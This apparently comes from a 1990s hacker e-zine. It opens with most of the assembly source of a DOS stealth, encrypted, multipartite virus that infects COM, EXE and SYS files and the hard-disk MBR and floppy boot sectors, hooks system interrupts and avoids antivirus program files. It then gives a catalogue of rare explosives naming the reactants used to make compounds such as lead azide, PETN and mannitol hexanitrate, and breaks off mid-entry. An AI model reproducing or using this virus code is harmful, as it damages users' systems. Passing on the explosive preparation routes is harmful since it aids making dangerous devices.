                mov     ah,2fh          ;Get file DTA
                call i21

                pop     ax
                inc     al
                push es
                pop ds
                jnz     fcb_okay
                add     bx,7h
fcb_okay:       mov ax, [bx+19h]
                mov cl, 9
                shr ax, cl
                cmp ax, 100                     ; 100 years more than expected?
                jb not_infected

                mov cx, 1
                cmp word ptr [bx+9], 'YS'       ; is it a SYS file?
                jne subtract
                cmp byte ptr [bx+11], 'S'
                jne subtract
                inc cx                          ; take twice as much from SYS
subtract:       sub word ptr [bx+1dh], v_len
                sbb word ptr [bx+1fh], 0
                loop subtract

not_infected:   pop     es
                pop ds
                pop cx
                pop     bx
                pop     ax
no_good:        iret

infect:         call save
                call save_name
infect_2:       call gooknuke                   ; DS=ES=CS
                call namechk
                jc go_bitch
                mov byte ptr [infected], 0      ; reset date change flag
                mov byte ptr [branch], @JO

                mov ax, 3524h
                call i21
                push es
                push bx
                mov dx, offset no_good          ; use the IRET from stealth bit
                mov ax, 2524h
                call i21                        ; disable Critical Error Handler
                push cs
                pop es

                mov dx, offset filename
                mov ax, 4300h
                call i21                        ; get attribs
                push cx
                mov ax, 4301h
                xor cx, cx
                call i21
                pop cx
                jc go_bitch1
                push cx
                mov ax, 3d02h
                mov dx, offset filename
                call i21                        ; open read/write
                jc bitch2
                xchg ax, bx
                mov ax, 5700h
                call i21
                push cx
                push dx
                xchg ax, dx
                mov cl, 9
                shr ax, cl
                cmp ax, 100                     ; 100 years more than expected?
                pop dx
                pop cx
                jae bitch3
                push cx
                push dx
                mov dx, offset signature
                mov ah, 3fh
                mov cx, 24
                call i21                        ; load header
                xor ax, cx                      ; file too small?
                jnz bitch4
                mov si, dx

                cmp al, 'M'
                je goexe                        ; it's an EXE
                cmp al, 'Z'
                je goexe
                cmp byte ptr [itype], @sys      ; is it a SYS file?
                je gosys
                jmp short gocom
go_bitch:       jmp short bitch
go_bitch1:      jmp short bitch1
bitch4:         pop dx
                pop cx
                cmp byte ptr [infected], 0      ; has the file been infected?
                je set4
                add dh, 0c8h                    ; add 100 years to date
set4:           mov ax, 5701h
                call i21
bitch3:         mov ah, 3eh
                call i21                        ; close file
bitch2:         push cs
                pop ds
                pop cx
                mov ax, 4301h
                mov dx, offset filename
                call i21                        ; reset attribs
bitch1:         pop dx
                pop ds
                mov ax, 2524h
                call i21
bitch:          call restore

goexe:          call exeinf
                jmp short bitch4
gocom:          call cominf
                jmp short bitch4
gosys:          call sysinf
                jmp short bitch4

cominf:         mov di, offset old_shit
                movsw                           ; save first 3 bytes
                call file_end
                or dx, dx
                jnz com_done
                cmp ax, 0f000h                  ; COM too big?
                jae com_done
                add ax, 15                      ; bypass SYS fill
                push ax
                mov byte ptr [gl], @JO
                call write_us
                mov di, offset signature
                mov al, 0e9h
                pop ax
                jmp write_head
com_done:       ret

        db      'Hey John! If this is bad, wait for [VCL20]!'

exeinf:         call file_end
                push ax                         ; check for internal overlays
                push dx
                mov ax, word ptr [page_cnt]
                mov cx, 512
                mul cx
                pop cx
                pop bp
                cmp ax, bp
                jb com_done
                cmp dx, cx
                jb com_done

                mov di, offset old_shit
                mov si, offset relo_ss
                movsw                           ; save the old shit

                call file_end

                mov byte ptr [gl], @JMPS
                mov cx, 10h                     ; # of paragraphs in whole file
                div cx
                sub ax, word ptr [hdr_size]     ; except the header
                mov word ptr [relo_cs], ax
                add dx, 18                      ; skip SYS fill
                mov word ptr [exe_ip], dx
                add dx, offset vstack+32        ; set up a stack
                mov word ptr [exe_sp], dx
                mov word ptr [relo_ss], ax
                call write_us

                mov cx, 512                     ; calculate new # of code pages
                div cx
                or dx, dx                       ; any bits left over?
                jz fp2
                inc ax                          ; yes, inc # pages to accommodate
fp2:            mov word ptr [part_page], dx
                mov word ptr [page_cnt], ax
                jmp write_head

sysinf:         dec si
                or ax, ax                       ; we'll only do files
                jz sys_ok                       ; starting with 0000 or FFFF
                inc ax                          ; (this excludes CONFIG.SYS)
                jz sys_ok
sys_ok:         mov si, offset signature+6
                mov di, offset old_shit
                movsw                           ; save old INTR offset
                call file_end
                add ax, 18                      ; skip SYS header shit
                mov word ptr [si-2], ax

                mov byte ptr [branch], @JMPS
                call write_us
                xor cx, cx
                mov dx, v_len                   ; file size increase = v_len*2
                mov ax, 4201h
                call i21
                mov ah, 40h
                call i21                        ; write 0 bytes
                                                ; (extend file to pointer)
write_head:     call file_zero
                mov dx, offset signature
                mov cx, 24
                mov ah, 40h
                call i21                        ; write the header
                mov byte ptr [infected], 1

eat_hd:         ; infect HD partition table
                ; assumes DS=ES=CS
                mov ax, 0201h
                mov bx, offset signature
                mov cx, 1
                mov dx, 80h
                call i13
                cmp word ptr [signature+2], @tsrchk
                je hd_done
                mov cx, @mbr                    ; sector 9
                mov ah, 3
                call i13
                mov di, bx
                mov word ptr [drv+1], 80h
                mov word ptr [sec+1], @mbr      ; original MBR
                mov si, offset kmart_kode
                mov cx, k_len
                rep movsb
                inc cx
                mov ah, 3
                mov byte ptr [residence], 1
                call i13
                mov ax, 0304h
                xor bx, bx
                mov cx, 10
                call i13
hd_done:        ret

eat_floppy:     ; do boot sector

                mov ax, 0201h
                mov bx, offset boot_sect
                mov cx, 1                       ; track 0 sector 1
                xor dh, dh                      ; head 0
                call i13

                lea si, [bx+3]
                mov cx, 8
kloop1:         lodsb
                cmp al, ' '
                jb nope
                cmp al, 'z'
                ja nope
                loop kloop1

; more complex than need be, to allow for old formats as well as new formats..
; it will check to see if it will cross a track boundary; if so, then it won't
; infect the disk.

                call calcsect
                push cx
                sub word ptr [totsecs], 5
                call calcsect
                pop ax
                sub ax, cx                      ; overrun track boundary?
                add al, 4
                jnz nope                        

                push dx
                xor dl, dl
                mov word ptr [drv+1], dx        ; drive 0.. on boot remember
                mov word ptr [sec+1], cx
                mov ax, 0301h
                mov bx, offset boot_sect
                pop dx
                call i13                        ; write it
                jc nope

                mov word ptr [oem+6], @tsrchk   ; fuck it up a bit
                                                ; so we don't reinfect it later
                inc cx
                mov ax, 0304h                   ; write virus code [4 sectors]
                xor bx, bx
                mov byte ptr [residence], 0
                call i13                        ; write ourselves

                mov di, offset boot_sect
                push di
                mov ax, 034ebh
                add di, 34h
                mov si, offset kmart_kode
                mov cx, k_len
                rep movsb                       ; patch boot sector
                pop bx
                inc cx
                mov ax, 0301h
                xor dh, dh
                call i13                        ; write patched boot sector
nope:           ret

calcsect:       push dx
                mov ax, word ptr [totsecs]      ; calculate track, head, sector
;                add ax, word ptr [hidnsecs]     ; of last sector
                xor dx, dx                      
                div word ptr [trksecs]
                mov cx, dx
                xor dx, dx
                div word ptr [headcnt]
                pop bx
                mov bh, dl
                push bx

                push cx                         ; remainder sectors
                mov cl, 6                       ; CH=track
                shl ah, cl
                pop cx
                add cl, ah                      ; bits 9 & 10 of track #
                mov ch, al                      ; sector
                pop dx

save_name:      push cs
                pop es
                mov di, offset filename
                push di
                mov si, dx
storename:      lodsb
                or al, al
                jnz storename
                pop dx                          ; DS:DX = filename
                push cs
                pop ds

namechk:        mov si, offset filename
nc1:            lodsb
                or al, al
                jnz nc1
                mov dx, si
                sub dx, 4
                sub si, 12
                cmp si, offset filename
                jae McAssFuck
                mov si, offset filename
McAssFuck:      dec si                          ; check for McWanker's
                cmp si, dx                      ; ]<o0L WaReZ
                je not_McWanker
                call chkMcAsshole
                je ncexit_err
                loop McAssFuck

not_McWanker:   mov di, offset exts             ; valid extensions
                mov cx, 5
                and ax, 0dfdfh                  ; -> uppercase
extchk:         scasw
                je extchk_2
                inc di
                loop extchk
ncexit_err:     stc                             ; nope
extchk_2:       lodsb
                and al, 0dfh
                jne ncexit_err
                mov byte ptr [itype], @com_exe
                cmp di, offset residence
                jb ncexit
                mov byte ptr [itype], @sys      ; OK, it's a SYS file
ncexit:         clc

chkMcAsshole:   and ax, 0dfdfh
                cmp ax, 'CS'                    ; SCAN?
                je chkma_end
                cmp ax, 'LC'                    ; CLEAN?
                je chkma_end
                cmp ax, 'SV'                    ; VSHIELD?
                je chkma_end
                cmp ax, '-F'                    ; F-PROT?
chkma_end:      ret

        db      'For Dudley'

domem:          mov bx, offset pre_gl
                push bx
                mov ax, bp
                dec ax
memloop:        mov ds, ax
                cmp byte ptr [0], 'Z'
                je fixmem
                mov bx, ax                      ; keep previous block
                add ax, word ptr [3]            ; up to next MCB
                inc ax
                jmp short memloop
fixmem:         cmp word ptr [3], p_len*5       ; is block too small?
                jae fm_ok
                mov ds, bx                      ; yeah, use previous block
                xchg ax, bx
fm_ok:          sub word ptr [3], p_len
                add ax, word ptr [3]
                inc ax
                mov word ptr [12h], ax
                mov es, ax
                xor ax, ax
                mov ds, ax
                sub word ptr [413h], 3          ; TOM=TOM-3  (not necessary)
                push cs
                pop ds
                xor di, di
                mov cx, v_len
                rep movsb
gohi:           push es
                mov ax, offset dms              ; dms = Do More Shit
                push ax

dms:            mov ax, 70h
                mov ds, ax
                mov si, 1
scan:           dec si
                cmp ax, 1effh                   ; CS segment override qualifier?
                jne scan
                mov ax, 2cah                    ; RETF 2 opcode
                cmp [si+4], ax                  ; (double check)
                je right
                cmp [si+5],ax
                jne scan                        ; nope, try again
right:          lodsw                           ; get the actual storage address
                xchg ax, si
                push si
                mov di, offset oldvect+4
                movsw                           ; save the original i21 vector
                pop si
                mov word ptr [si], offset go_n13
                mov word ptr [si+2], cs

do13_2:         push cs
                pop ds
                mov dx, 80h
                call eat_hd
                jnc go_ints                     ; hard drive infect fucked up?
                xor dx, dx                      ; yep, infect floppy instead
                call eat_floppy
go_ints:        call enable
                xor ax, ax
                mov ds, ax
                call capture_21
                push cs
                pop ds

        db      '[VCL20]'

write_us:       call file_end
                xor ax, ax
                int 1ah
                mov word ptr [key+1], dx
                mov di, offset eret
                mov cx, wheelchair_len
                mov si, offset wheelchair
                rep movsb                       ; move the temporary code
                mov byte ptr [go_n13], @JMPS    ; bypass new13
                call encr_decr
                call enable                     ; and re-enable it
                call file_end

; this wheelchair stuff is probably the most dodgey code in the whole virus...

wheelchair:     mov byte ptr [eret], @RET       ; repair the code
                mov ah, 40h
                mov cx, v_len
                xor dx, dx
                call dword ptr cs:[oldvect+8]   ; write encrypted bitch
                mov ax, offset encr_decr
                call ax                         ; now decrypt ourselves! [hehe]
wheelchair_len equ $-wheelchair                 ; length of temp code

capture_13:     mov di, offset oldvect+4
                mov ax, offset go_n13
capture_13_2:   mov si, 13h*4
                xor dx, dx
                mov ds, dx
                call doint

capture_21:     mov si, 21h*4
                mov di, offset oldvect+8
                mov ax, offset new21
                call doint

doint:          mov cx, 2
d2:             xchg [si], ax
                lodsw                           ; inc si by 2
                mov ax, cs
                loop d2

i13:            pushf                           ; simulate int 13h
                push cs
                call bypass

enable:         mov byte ptr [go_n13], @JO      ; restore jump to new13

save:           pop word ptr cs:[temp_jmp]      ; preserve registers
                push ax
                push bx
                push cx
                push dx
                push si
                push di
                push ds
                push es
                push bp
                jmp word ptr cs:[temp_jmp]

restore:        pop word ptr cs:[temp_jmp]      ; and give them back
                pop bp
                pop es
                pop ds
                pop di
                pop si
                pop dx
                pop cx
                pop bx
                pop ax
                jmp word ptr cs:[temp_jmp]

gooknuke:       push cs
                pop ds
                push cs
                pop es

kmart_kode:     jmp short kkk3
        dw      @tsrchk                         ; infection marker
kkk3:           cli
                xor ax, ax
                mov ss, ax
                mov sp, 7c00h
                mov ds, ax

sec:            mov cx, 0
drv:            mov dx, 0
                push dx
ffq:            push cx

                call chk
                jz go69
                mov si, 412h
                add word ptr [si+1], -3         ; take 3k

                mov cl, 6
                shl ax, cl
                mov es, ax
                xor bx, bx
                mov ax, 0204h                   ; read us into high memory
                pop cx
                push cx
                inc cx
                int 13h
go69:           push es
                mov ax, offset disk_entry
                push ax

chk:            mov ax, @tsrchk
                int 13h
                xor bx, @tsrchk
k_len   equ     $-kmart_kode

disk_entry:     call chk
                jz de_exit
                mov di, offset oldvect+0
                mov ax, offset new13_2
                call capture_13_2
                call capture_13                 ; make new13 jump to new13_2
                mov si, 21h*4
                call gooknuke
                cmp byte ptr [residence], 1
                je de_exit
                mov dx, 80h
                call eat_hd
de_exit:        xor ax, ax
                mov es, ax
                pop cx
                pop dx
                mov bx, 7c00h
                push es
                push bx
                mov ax, 0201h
                int 13h

old_shit:       int 20h
        dw      0,0,0

exts    db      'COMEXEBINOVLSYS'               ; valid extensions

residence db    0                               ; 0=from floppy boot
                                                ; 1=from MBR

e_end:                                          ; end of encrypted data

strat:          push ax
                push ds
                lds ax, dword ptr cs:[strat_1]  ; trick the host driver
        db      9ah
strat_1 dd      0
                mov ax, word ptr [6]
                mov word ptr cs:[strat_1], ax   ; update pointer if changed
                jmp short sys_return            ; (cater for other infections)

intr:           push ax
                push ds
                lds ax, dword ptr cs:[intr_1]
        db      9ah
intr_1  dd      0
                mov ax, word ptr [8]
                mov word ptr cs:[intr_1], ax
sys_return:     pop ds
                pop ax

go_n13:         jo bypass                       ; bypass new13 while encrypted
                jmp new13
bypass:         jmp dword ptr cs:[oldvect+4]

move_us:        rep movsb                       ; this must be here in case it's
                ;int 05
                jmp bx                          ; a very small SYS file, so the
                                                ; move doesn't hang the system

encr_decr:      push cs
                pop ds
                call $+3
faewq:          pop si
                sub si, offset faewq - e_start
                mov cx, (e_len)-1
key:            mov ax, 0                       ; harmless so far
dloop:          xor word ptr [si], ax
                inc si
                inc al                          ; yeah wreck the key
                dec ah
                loop dloop
eret:           ret                             ; this code gets changed to
                                                ; write the virus to file


; wheelchair code goes here

itype   equ     $+wheelchair_len
infected equ    itype + 2
temp_jmp equ    infected + 1
oldvect equ     temp_jmp + 2                    ;        +0  old i13
                                                ;        +4  multipartite handler
                                                ;        +8  old i21
signature equ   oldvect + 12
part_page       equ signature + 2       ; part-page at EOF
page_cnt        equ part_page + 2       ; count of code pages
hdr_size        equ page_cnt + 4        ; size of header in paragraphs
relo_ss         equ hdr_size + 6        ; displacement of stack segment (SS)
exe_sp          equ relo_ss + 2         ; stack pointer (SP)
chksum          equ exe_sp + 2          ;
exe_ip          equ chksum + 2          ; instruction pointer (IP)
relo_cs         equ exe_ip + 2          ; displacement of code segment (CS)
                                        ; 24 bytes
vstack          equ relo_cs + 2         ; temp stack for EXE file
handle          equ relo_cs + 2         ; save for file handle on Create
filename        equ handle + 2          ; filename of target file

boot_sect       equ relo_cs + 100       ; as not to overwrite things by accident
oem             equ boot_sect + 3
sectsize        equ oem + 8
clustsize       equ sectsize + 2
ressecs         equ clustsize + 1
fatcnt          equ ressecs + 2
rootsiz         equ fatcnt + 1
totsecs         equ rootsiz + 2
media           equ totsecs + 2
fatsize         equ media + 1
trksecs         equ fatsize + 2
headcnt         equ trksecs + 2
hidnsecs        equ headcnt + 2

v_len   equ     v_end - v_start

e_len   equ     e_end - e_start

------------------------------- CUT HERE ---------------------------------------
          uK                                                       E-
          E-            "Uncommon And Rare Explosives"             Nu
          Nu                                                       KE
          KE                         By                            -N
          -N                                                       uK
          uK                        Viper                          E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% Uncommon And Rare Explosives %

Table Of Contents
Entry Number    Chemical Name/Topic
~~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~
?               Introduction
?               Technical Notes
1               Acetyl Nitrate
2               Ammonium Picrate
3               Benzoyl Peroxide
4               Chlorine Dioxide
5               Chlorine Heptoxide
6               Chlorine Monoxide
7               Cyanogen Azide
8               Diazoacetic Ester
9               Diazomethane
10              2,4-Dinitroresorcinol
11              Erythrityl Tertranitrate
12              Ethyl Ether
13              Fluorine Nitrate
14              Fluorine Perchlorate
15              Gold, Explosive
16              Hydroxylamine
17              Isopropyl Ether
18              Lead Azide
19              Mannitol Hexanitrate
20              Mercuric Oxycyanide
21              Methyl Nitrate
22              Nitramine, Tetralite, Tetryl.
23              Nitrogen Chloride
24              Nitrogen Selenide
25              Nitroguanidine
26              Pentaerythritol Tetranitrate, PETN
27              Pentrinitrol
28              Pentryl
29              Peracetic Acid
30              Performic Acid
31              Potassium Picrate
32              Propargyl Nitrate
33              n-Propyl Nitrate
34              Silver Perchlorate
35              Tetranitromethane
36              Tetrasilane
37              Tetrasulfur Tetranitride
38              sym-Trinitrobenzene
39              Trinitromethane
40              Uranyl Nitrate

Entry: ?
                      % Introduction %
        This file contains the entries of uncommon or rare explosives.
By this, it is meant that the following compounds have explosive properties, 
but are not used as commercial/military explosives and/or they are generally 
unknown to the public.  They may not be used as commercial/military
explosives for a number of reason, some of which may be:  lack of stability,
cost of materials, difficulty of synthesis, cost of synthesis, toxicity, etc.
The general format of the compound entries will be as follows:

Entry:                  Entry Number
Name:                   Common Name
IUPAC Name:             IUPAC Designated Name
Condensed Formula:      Molecular Formula / Structural Condensed Formula
Physical Properties:    Some physical properties of the explosive
Explosive Properties:   The explosive properties of the compound
Manufacture:            The manufacturing procedure, and lab preparation
                        procedure (if given)
Use:                    The use
Toxicity (if known):    Toxicity, and side effects if known

NOTE:  Most of the following compounds are highly dangerous.  Due to this
       fact, this article has been written for the knowledge of the 
       explosives rather than the experience of making them.  Thus, the
       manufacture of each explosive compound will not be given in a step
       by step "how to" fashion, but rather just the bare minimum reactant
       chemicals (if given).  The author holds no responsibility for the
       way any individual, or group uses the following information.


Entry: ?

                      % Technical Notes %

        Being interested in explosives as I am, and not seeing any
new files on explosives (or new explosives themselves), I decided to
write this file, based on a huge chemistry reference manual containing
more than 10,000 chemical compounds.  I hope many others will find it as
useful as I have.

        The elimination process for chemicals occured as follows:        
        (1) Any chemicals that are commonly known to the public were 
        eliminated.  Examples are 2,4,6-trinitrotoluene (TNT),
        1,2,3-Propanetriol trinitrate (nitroglycerin), and 
        cellulose hexanitrate (guncotton).

        (2) Any chemicals that were listed or described in any other file
        i have seen were eliminated.  Examples are ammonium tri-iodide,
        acetone peroxide, and mercury fulminate.  I gave the picric acid
        salts, and a few other explosives, an exception to this rule
        because I think they are important explosives.

        (3) The chemical has to be explosive by itself, not a redox or other
        type of reaction (e.g. dust/particle explosion, or gas/combustible
        explosion).  This eliminated chemicals such as potassium
        permanganate.  I gave the chemicals ethyl ether, and isopropyl ether
        an exception to this rule as they form an unknown explosive peroxide
        readily that conforms to all other rules.

        Any compounds that passed the three processes are included in this
        file.  I regret any N/A's (not available) and will try to find
        the missing information in the future.


Entry: 1

Name:                   Acetyl Nitrate
IUPAC Name:             Acetic acid anhydride with nitric acid
Condensed Formula:      C2H3NO4 / CH3COONO2
Physical Properties:    Fuming, colorless, hygroscopic liquid. bp 22 c.
Explosive Properties:   Should be stored in a solution of P2O5 to stabilize
                        it.  Always explodes when heated above 60 c or comes
                        into contact with HgO.  Explosions have also occured
                        with ground glass surfaces.
Manufacture:            Preparation from acetic anhydride and N2O5.
Use:                    In nitrations to introduce a single nitro group in
                        an ortho position on an aromatic ring.
Toxicity (if known):    Irritant, corrosive.


Entry: 2

Name:                   Ammonium Picrate
IUPAC Name:             2,4,6,-Trinitrophenol ammonium salt
Condensed Formula:      C6H6N4O7
Physical Properties:    Bright yellow bitter scales or orthorhombic crystals.
                        d 1.72.  Slightly soluble in alcohol.
Explosive Properties:   Explodes easily from heat or shock.
Manufacture:            By subsitution of the ammonia group (NH4) on 
                        the hydrogen of the 1-hydroxyl group.
Use:                    In explosives, fireworks, rocket propellants.
Toxicity (if known):    N/A


Entry: 3

Name:                   Benzoyl Peroxide
IUPAC Name:             Dibenzoyl Peroxide
Condensed Formula:      C14H10O4 / (C6H5CO)2O2
Physical Properties:    Crystals. mp 103 -106 c. Sparingly soluble in water.
Explosive Properties:   May explode when heated.
Manufacture:            Prepared by the interaction of benzoyl chloride and a
                        cooled solution of sodium peroxide.
Use:                    Oxidizing agent in bleaching oils, flours, etc.  
                        Catalyst in the plastics industry; initiator in
Toxicity (if known):    Non toxic in small amounts.


Entry: 4

Name:                   Chlorine Dioxide
IUPAC Name:             Chlorine Peroxide
Condensed Formula:      ClO2
Physical Properties:    Strong oxidizing yellow to reddish yellow gas at room
                        temp.  Unplesant odor similar to that of chlorine
                        and reminiscent of that of nitric acid.  Unstable in
                        light; stable in dark if pure.  Reacts violently with
                        organic materials.  mp -59 c, bp 11 c.
Explosive Properties:   In concentrations in excess of 10% at atmospheric 
                        pressure it is easily detonated by sunlight, heat,
                        contact with mercury or carbon monoxide.
Manufacture:            Prepared from chlorine and sodium chlorite; from 
                        potassium chlorate and sulfuric acid; by passing NO2
                        through a column of sodium chlorate.
Use:                    Bleaching cellulose, paper-pulp, flour, leather, fats
                        and oils, textiles, beeswax; purification of water;
                        tast and odor control of water; cleaning and 
                        detanning leather; oxidizing agent; bactericide and
Toxicity (if known):    May be highly irritating to skin and mucous membranes
                        of respiratory tract.  May cause pumonary edema.


Entry: 5

Name:                   Chlorine Heptoxide
IUPAC Name:             Dichlorine heptoxide
Condensed Formula:      Cl2O7
Physical Properties:    Colorless, very volitile oily liquid. mp -91.5 c, bp
                        -82 c.  Slowly hydrolyzed by water forming perchloric
Explosive Properties:   Explodes violently upon concussion or on contact with
                        a flame or iodine.
Manufacture:            Prepared by dehydration of perchloric acid with P2O5.
Use:                    Catalyst in cellulose esterification.
Toxicity (if known):    May be irritating to skin, mucous membranes.


Entry: 6

Name:                   Chlorine Monoxide
IUPAC Name:             Dichlorine monoxide
Condensed Formula:      Cl2O
Physical Properties:    Yellowish-brown gas.  Disagreeable, penetrating odor.
                        mp -120.6 c, bp 2.2 c.  One volume of water will 
                        dissolve more than 100 volumes Cl2O with formation
                        of HClO.
Explosive Properties:   Explodes on contact with organic material.  Can also
                        be cause to explode by a spark or by heating.
Manufacture:            Prepared from yellow mercuric oxide and chlorine.
Use:                    Chlorinating agent.
Toxicity (if known):    Intensely irritating to eyes, skin, mucous membranes,
                        respiratory tract.


Entry: 7

Name:                   Cyanogen Azide
IUPAC Name:             Carbon pernitride
Condensed Formula:      CN4 / (N-)=(N+)=N-C?N
Physical Properties:    Clear colorless oily liquid.  Half-life of a 27% 
                        solution in acetonitrile (stabalizer) is 15 days
                        at room temp, more stable at lower temps.  Can
                        be handled relativly safely in solvents.
Explosive Properties:   The pure azide detonates violently upon thermal,
                        electrical or mechanical shock.
Manufacture:            Prepared by suspending NaN3 in dry acetonitrile and
                        distilling cyanogen chloride into the cooled 
Use:                    In organic synthesis.
Toxicity (if known):    Assumed to be toxic.


Entry: 8

Name:                   Diazoacetic Ester
IUPAC Name:             Ethyl diazoacetate
Condensed Formula:      C4H6N2O2 / (N-)=(N+)=CHCOOC2H5
Physical Properties:    Yellow oil.  Pungent odor.  Very volitile.  mp -22 c.
                        Slightly soluble in water.
Explosive Properties:   This substance is very explosive.  Distillation, even
                        under reduced pressure, is dangerous.  Explodes on
                        contact with concentrated H2SO4
Manufacture:            Prepared by the action of sodium nitrite on glycine
                        ethyl ester hydrochloride.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 9

Name:                   Diazomethane
IUPAC Name:             Azimethylene
Condensed Formula:      CH2N2 / CH2=(N+)=(N-)
Physical Properties:    Yellow gas.  mp -145 c, bp -23 c.  Copper powder and
                        solid calcium chloride causes active decomposition
                        with the evolution of nitrogen and the formation of
                        insoluble white flakes of polymethylene (CH2)?.
Explosive Properties:   The undiluted liquid and concentrated solutions may
                        explode violently, especially if impurities are 
                        present.  Gaseous diazomethane may explode on heating
                        to 100 c or on rough glass surfaces.  Alkali metals
                        also produce explosions with diazomethane.
Manufacture:            Prepared from chloroform and hydrazine by reaction
                        with potassium hydroxide; from KOH and nitrosomethyl-
                        urea.  These methods yield gaseous diazomethane.  The
                        following procedures yield ether solutions of 
                        diazomethane.  From N-nitroso-?-methylaminoisobutyl
                        methyl ketone in ether and isopropanol by reaction
                        with sodium isopropoxide or from the same ketone in
                        ether by reaction with sodium cyclohexoxide.  In the
                        laboratory diazomethane may be prepared most simply
                        by the action of alkali on the commercially available
Use:                    Powerful methylating agent for acidic compounds such
                        as carboxylic acids, phenols, enols.
Toxicity (if known):    Very toxic.  Insidious poison (a well ventilated hood
                        is absolutely necessary), avoid vapor.  Strong 
                        irritant.  Does not cause discernible reaction at the
                        time of contact, but later even in minute amounts,
                        produces an inflammatory reaction.  Hypersensitivity
                        results which makes it impossible to work with 
                        diazomethane without attacks of asthma and associated


Entry: 10

Name:                   2,4-Dinitroresorcinol
IUPAC Name:             2,4-Dinitro-1,3-benzenediol
Condensed Formula:      C6H4N2O6
Physical Properties:    Yellow crystals, mp 146-148 c.  Very slightly soluble
                        in cold water or alcohol.
Explosive Properties:   Explodes when stongly heated.
Manufacture:            --Can be bought commercially (through chem company).
Use:                    For dyeing fabrics mordanted with iron a green color.
                        As a reagent for Co (brown-red ppt) and for Fe (olive
                        green color).
Toxicity (if known):    N/A


Entry: 11

Name:                   Erythrityl Tertranitrate
IUPAC Name:             (R*,S*)-1,2,3,4-Butane-tetroltetranitrate
Condensed Formula:      C4H6N4O12
Physical Properties:    Leaflets from alcohol, mp 61 c.  Soluble in alcohol,
                        ether, glycerol.  Insoluble in water.
Explosive Properties:   Explodes on percussion.
Manufacture:            Made by the nitration of erythritol
Use:                    Coronary vasodilator.
Toxicity (if known):    N/A


Entry: 12

Name:                   Ethyl Ether
IUPAC Name:             1,1'-Oxybisethane
Condensed Formula:      C4H10O / C2H5OC2H5
Physical Properties:    Mobile, very heave flammable liquid.  Vapor heavier
                        than air.  Characteristic, sweetish, pungent odor,
                        more agreeable than chloroform.  Burning taste.
                        mp -116.3 (stable crystals)/-123.3 (metastable 
                        crystals).  Air-ether mixture containing more than
                        1.85 volume-% of ether vapor are explosive hazards.
Explosive Properties:   Ethyl Ether is not explosive in itself, but when 
                        dried tends to forms highly explosive percussion, 
                        heat, and friction sensitive peroxides.
Manufacture:            Produced on a large scale by dehydration of ethanol
                        or by hydration of ethylene, both processes being 
                        carried out in the presence of sulfuric acid.
Use:                    In the manufacture of gunpower.  As a primer in 
                        gasoline engines.  Solvent for waxes, fats, oils, 
                        perfumes, etc.  Easily removable extractant of 
Toxicity (if known):    Mildy irritating to skin, mucous membranes.  
                        Inhalation of high concentrations causes narcosis,
                        unconsciousness.  Death may occur due to respiratory


Entry: 13

Name:                   Fluorine Nitrate
IUPAC Name:             Nitroxy fluoride
Condensed Formula:      FNO3 / FONO2
Physical Properties:    Colorless gas.  Moldy acrid odor.  mp -175 c, bp 
                        -45.9 c.  Soluble in acetone.  Powerful oxidizing
Explosive Properties:   The liquid explodes on slight percussion.
Manufacture:            Prepared by the action of fluorine on nitric acid.
Use:                    Oxidizing agent in rocket propellants.
Toxicity (if known):    N/A


Entry: 14

Name:                   Fluorine Perchlorate
IUPAC Name:             Chlorine tetroxyfluoride
Condensed Formula:      ClFO4 / FOCLO3
Physical Properties:    Colorless gas.  Pungent, acrid odor.  mp -167.3 c,
                        bp -15.9 c.
Explosive Properties:   Explodes on the slightest provocation, i.e., on
                        contact with rought surfaces, dust, grease, rubber,
                        on melting, distilling, etc.
Manufacture:            Prepared by passing fluorine over cold 72% aqueous
                        perchloric acid in platinum apparatus.
Use:                    N/A
Toxicity (if known):    Attacks the lungs even in traces.


Entry: 15

Name:                   Gold, Explosive
IUPAC Name:             "Fulminating Gold"
Condensed Formula:      N/A
Physical Properties:    Dark brown powder.
Explosive Properties:   Explodes on heating or rubbing to give gold, nitrogen
                        and ammonia.  The exact composition of the compound
                        is unknown since it is too explosive to be dried.
                        Therefore the only elements that can be determined
                        are gold, nitrogen, and chlorine.
Manufacture:            Obtained by the action of ammonia on auric chloride
                        or ammonium chloride on auric oxide.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 16

Name:                   Hydroxylamine
IUPAC Name:             Hydroxylamine
Condensed Formula:      H3NO / NH2OH
Physical Properties:    Unstable large white flakes or needles, mp 33 c, bp 
                        58 c.  Very soluble in water, liquid ammonia and
Explosive Properties:   Detonates in test tube heated with flame.
Manufacture:            N/A
Use:                    As reducing agent in photography; in synthesis and
                        analytical chemistry; to purify aldehydes and 
                        ketones.  As antioxidant for fatty acis and soaps.
                        As dehairing agent for hides.
Toxicity (if known):    Skin irritant.  May cause methemoglobinemia,
                        sulfhemoglobinemia, cyanosis, convulsions, 
                        hypotension and coma.


Entry: 17

Name:                   Isopropyl Ether
IUPAC Name:             2,2'-Oxybis[propane]
Condensed Formula:      C6H14O
Physical Properties:    Liquid.  mp -60 c, bp 68-69 c.
Explosive Properties:   Isopropyl Ether is not explosive in itself, but when
                        unstabalized with p-benzylaminophenol it tends to
                        forms highly explosive percussion, heat, and friction
                        sensitive peroxides.
Manufacture:            N/A.  Safer to buy through a chemical company.
Use:                    N/A
Toxicity (if known):    Mildy irritating to skin, mucous membranes.  
                        Inhalation of high concentrations causes narcosis,
                        unconsciousness.  Death may occur due to respiratory


Entry: 18

Name:                   Lead Azide
IUPAC Name:             Lead Azide
Condensed Formula:      N6Pb / Pb(N3)2
Physical Properties:    Needles or white powder.  Heat of formation at 25 c:
                        +110.5 kcal/mol.
Explosive Properties:   Explodes at 350 c or on percussion.
Manufacture:            Prepared from sodium azide and lead nitrate.
Use:                    As a primer in explosives.
Toxicity (if known):    N/A


Entry: 19

Name:                   Mannitol Hexanitrate
IUPAC Name:             Mannitol nitrate
Condensed Formula:      C6H8N6O18
Physical Properties:    Long needles in regular clusters. mp 106-108 c.
                        Soluble in alcohol, insoluble in water.
Explosive Properties:   Explodes on percussion.  It is stable at ordinary
                        tempatures so that it may be used commercially,
                        but it is distinctly less stable than nitroglycerol
                        at 75 c or above.
Manufacture:            Nitration of mannitol.
Use:                    Vasodilator.
Toxicity (if known):    N/A


Entry: 20

Name:                   Mercuric Oxycyanide
IUPAC Name:             Mercury cyanide oxide
Condensed Formula:      C2Hg2N2O / HgO.Hg(CN)2
Physical Properties:    White, orthorhombic crystals or crystal powder.
Explosive Properties:   It explodes when touched with a flame or by
